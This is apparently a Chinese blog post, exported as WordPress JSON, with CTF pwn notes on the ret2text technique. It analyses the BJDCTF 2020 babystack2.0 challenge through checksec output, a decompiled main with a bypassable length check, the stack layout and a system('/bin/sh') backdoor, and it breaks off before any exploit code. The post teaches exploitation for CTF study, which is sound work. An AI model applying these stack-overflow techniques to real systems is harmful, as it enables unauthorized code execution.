{"id":149,"date":"2025-04-29T13:45:00","date_gmt":"2025-04-29T05:45:00","guid":{"rendered":"http:\/\/www.triode.cc\/?p=149"},"modified":"2025-09-28T13:29:22","modified_gmt":"2025-09-28T05:29:22","slug":"pwn1-ret2xxx","status":"publish","type":"post","link":"https:\/\/www.triode.cc\/index.php\/2025\/04\/29\/pwn1-ret2xxx\/","title":{"rendered":"Pwn\u7b14\u8bb0(1) ret2\u7cfb\u5217"},"content":{"rendered":"\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u60f3\u4e86\u4e00\u4e0b\uff0c\u8fd8\u662f\u628a\u4e4b\u524d\u5b66\u7684\u4e00\u70b9Pwn\u653e\u4e0a\u6765\u5427\uff0c\u672c\u6587\u7684\u4f8b\u9898\u90fd\u662f64\u4f4d\u7684\u7a0b\u5e8f\uff0c\u8fd9\u4e9b\u6280\u672f\u572832\u4f4d\u7a0b\u5e8f\u4e0a\u5b9e\u9645\u4e0a\u4e5f\u662f\u7c7b\u4f3c\u7684<\/p>\n<\/blockquote>\n\n\n\n<h2 class=\"wp-block-heading\">ret2text<\/h2>\n\n\n\n<p>ret2text\u662f\u63a7\u5236\u7a0b\u5e8f\u6267\u884c\u7a0b\u5e8f\u672c\u8eab\u5df2\u7ecf\u6709\u7684\u4ee3\u7801\uff08\u5373<code>.text<\/code>\u6bb5\u7684\u4ee3\u7801\uff09\uff0c\u5728\u63a7\u5236\u7a0b\u5e8f\u6267\u884c\u4ee3\u7801\u7684\u65f6\u5019\u4e5f\u53ef\u4ee5\u6267\u884c\u51e0\u6bb5\u4e0d\u8fde\u7eed\u7684\u5df2\u6709\u4ee3\u7801\uff08\u5373gadgets\uff09\uff0c\u8fd9\u65f6\uff0c\u6211\u4eec\u9700\u8981\u77e5\u9053\u5bf9\u5e94\u8fd4\u56de\u7684\u4ee3\u7801\u7684\u4f4d\u7f6e\u3002\u5f53\u7136\u7a0b\u5e8f\u4e5f\u53ef\u80fd\u4f1a\u5f00\u542f\u67d0\u4e9b\u4fdd\u62a4\uff0c\u6211\u4eec\u9700\u8981\u60f3\u529e\u6cd5\u53bb\u7ed5\u8fc7\u8fd9\u4e9b\u4fdd\u62a4\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u4f8b\uff1a[BJDCTF 2020]babystack2.0<\/h4>\n\n\n\n<p>\u9898\u76ee\uff1a<a href=\"https:\/\/www.nssctf.cn\/problem\/709\">BJDCTF 2020-babystack2.0 | NSSCTF<\/a><\/p>\n\n\n\n<p>checksec\u53ef\u4ee5\u77e5\u9053\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" 
style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>Arch:     amd64\nRELRO:    Partial RELRO\nStack:    No canary found\nNX:       NX enabled\nPIE:      No PIE (0x400000)<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span 
style=\"color: #88C0D0\">Arch:<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #A3BE8C\">amd64<\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">RELRO:<\/span><span style=\"color: #D8DEE9FF\">    <\/span><span style=\"color: #A3BE8C\">Partial<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">RELRO<\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">Stack:<\/span><span style=\"color: #D8DEE9FF\">    <\/span><span style=\"color: #A3BE8C\">No<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">canary<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">found<\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">NX:<\/span><span style=\"color: #D8DEE9FF\">       <\/span><span style=\"color: #A3BE8C\">NX<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">enabled<\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">PIE:<\/span><span style=\"color: #D8DEE9FF\">      <\/span><span style=\"color: #A3BE8C\">No<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">PIE<\/span><span style=\"color: #D8DEE9FF\"> (0x400000)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>没有Canary和PIE，但是存在NX保护。这三项直接决定了利用思路：没有Canary，说明栈溢出覆盖返回地址时不会被检测到；没有PIE，说明程序自身代码的地址是固定的（基址0x400000），IDA里看到的地址可以直接用，不需要先泄露；NX开启则说明栈上的数据不可执行，不能把shellcode写进栈里再跳过去，所以只能让程序“返回”到它本身已有的代码上，这正是ret2text的适用场景。Partial RELRO（GOT表可写）在这一题里用不到。<\/p>\n\n\n\n<p>\u7528IDA\u6253\u5f00\u9644\u4ef6\uff0c\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 
14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  char buf&#91;12&#93;; \/\/ &#91;rsp+0h&#93; &#91;rbp-10h&#93; BYREF\n  size_t nbytes; \/\/ &#91;rsp+Ch&#93; &#91;rbp-4h&#93; BYREF\n\n  setvbuf(_bss_start, 0LL, 2, 0LL);\n  setvbuf(stdin, 0LL, 1, 0LL);\n  LODWORD(nbytes) = 0;\n  puts(\"**********************************\");\n  puts(\"*     Welcome to the BJDCTF!     *\");\n  puts(\"* And Welcome to the bin world!  *\");\n  puts(\"*  Let's try to pwn the world!   
*\");\n  puts(\"* Please told me u answer loudly!*\");\n  puts(\"&#91;+&#93;Are u ready?\");\n  puts(\"&#91;+&#93;Please input the length of your name:\");\n  __isoc99_scanf(\"%d\", &amp;nbytes);\n  if ( (int)nbytes > 10 )\n  {\n    puts(\"Oops,u name is too long!\");\n    exit(-1);\n  }\n  puts(\"&#91;+&#93;What's u name?\");\n  read(0, buf, (unsigned int)nbytes);\n  return 0;\n}<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">int<\/span><span style=\"color: #D8DEE9FF\"> __cdecl <\/span><span style=\"color: #88C0D0\">main<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">int<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #D8DEE9\">argc<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">const<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">char<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">**<\/span><span style=\"color: #D8DEE9\">argv<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">const<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">char<\/span><span 
style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">**<\/span><span style=\"color: #D8DEE9\">envp<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #81A1C1\">char<\/span><span style=\"color: #D8DEE9FF\"> buf<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #B48EAD\">12<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #81A1C1\">;<\/span><span style=\"color: #616E88\"> \/\/ &#91;rsp+0h&#93; &#91;rbp-10h&#93; BYREF<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #81A1C1\">size_t<\/span><span style=\"color: #D8DEE9FF\"> nbytes<\/span><span style=\"color: #81A1C1\">;<\/span><span style=\"color: #616E88\"> \/\/ &#91;rsp+Ch&#93; &#91;rbp-4h&#93; BYREF<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">setvbuf<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">_bss_start<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #81A1C1\">LL<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">2<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #81A1C1\">LL<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">setvbuf<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">stdin<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> 
<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #81A1C1\">LL<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">1<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #81A1C1\">LL<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">LODWORD<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">nbytes<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">**********************************<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">*     Welcome to the BJDCTF!     *<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">* And Welcome to the bin world!  
*<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">*  Let&#39;s try to pwn the world!   *<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">* Please told me u answer loudly!*<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93;Are u ready?<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93;Please input the length of your name:<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">__isoc99_scanf<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">%d<\/span><span 
style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">&amp;<\/span><span style=\"color: #D8DEE9FF\">nbytes<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #81A1C1\">if<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">int<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">nbytes <\/span><span style=\"color: #81A1C1\">&gt;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">10<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #ECEFF4\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">    <\/span><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Oops,u name is too long!<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">    <\/span><span style=\"color: #88C0D0\">exit<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #B48EAD\">1<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #ECEFF4\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: 
#ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93;What&#39;s u name?<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">read<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> buf<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">unsigned<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">int<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">nbytes<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #81A1C1\">return<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">}<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u5982\u4e0b\u6808\uff0c\u6211\u4eec\u7684\u76ee\u7684\u662f\u8fd4\u56de\u5730\u5740\uff08\u4e5f\u5c31\u662fIDA\u53d8\u91cf\u6808\u4e2d\u6807\u6ce8<code>r<\/code>\u7684\u5730\u65b9\uff0c\u90a3\u91cc\u5b9e\u9645\u4e0a\u662f<code>main<\/code>\u7684\u8fd4\u56de\u5730\u5740\uff09<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 
16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>-0000000000000010 buf             db 12 dup(?)\n-0000000000000004 nbytes          dq ?\n+0000000000000004                 db ? ; undefined\n+0000000000000005                 db ? ; undefined\n+0000000000000006                 db ? ; undefined\n+0000000000000007                 db ? 
; undefined\n+0000000000000008  r              db 8 dup(?)\n+0000000000000010\n+0000000000000010 ; end of stack variables<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #D8DEE9FF\">-<\/span><span style=\"color: #B48EAD\">0000000000000010<\/span><span style=\"color: #D8DEE9FF\"> buf             <\/span><span style=\"color: #81A1C1\">db<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">12<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">dup<\/span><span style=\"color: #D8DEE9FF\">(?)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">-<\/span><span style=\"color: #B48EAD\">0000000000000004<\/span><span style=\"color: #D8DEE9FF\"> nbytes          <\/span><span style=\"color: #81A1C1\">dq<\/span><span style=\"color: #D8DEE9FF\"> ?<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">+<\/span><span style=\"color: #B48EAD\">0000000000000004<\/span><span style=\"color: #D8DEE9FF\">                 <\/span><span style=\"color: #81A1C1\">db<\/span><span style=\"color: #D8DEE9FF\"> ? 
<\/span><span style=\"color: #616E88\">; undefined<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">+<\/span><span style=\"color: #B48EAD\">0000000000000005<\/span><span style=\"color: #D8DEE9FF\">                 <\/span><span style=\"color: #81A1C1\">db<\/span><span style=\"color: #D8DEE9FF\"> ? <\/span><span style=\"color: #616E88\">; undefined<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">+<\/span><span style=\"color: #B48EAD\">0000000000000006<\/span><span style=\"color: #D8DEE9FF\">                 <\/span><span style=\"color: #81A1C1\">db<\/span><span style=\"color: #D8DEE9FF\"> ? <\/span><span style=\"color: #616E88\">; undefined<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">+<\/span><span style=\"color: #B48EAD\">0000000000000007<\/span><span style=\"color: #D8DEE9FF\">                 <\/span><span style=\"color: #81A1C1\">db<\/span><span style=\"color: #D8DEE9FF\"> ? <\/span><span style=\"color: #616E88\">; undefined<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">+<\/span><span style=\"color: #B48EAD\">0000000000000008<\/span><span style=\"color: #D8DEE9FF\">  r              <\/span><span style=\"color: #81A1C1\">db<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">dup<\/span><span style=\"color: #D8DEE9FF\">(?)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">+<\/span><span style=\"color: #B48EAD\">0000000000000010<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">+<\/span><span style=\"color: #B48EAD\">0000000000000010<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #616E88\">; end of stack variables<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u540c\u65f6\u7a0b\u5e8f\u63d0\u4f9b\u4e86\u4e00\u4e2a\u540e\u95e8\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" 
data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>__int64 backdoor()  \n{  \n  system(\"\/bin\/sh\");  \n  return 1LL;  \n}<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" 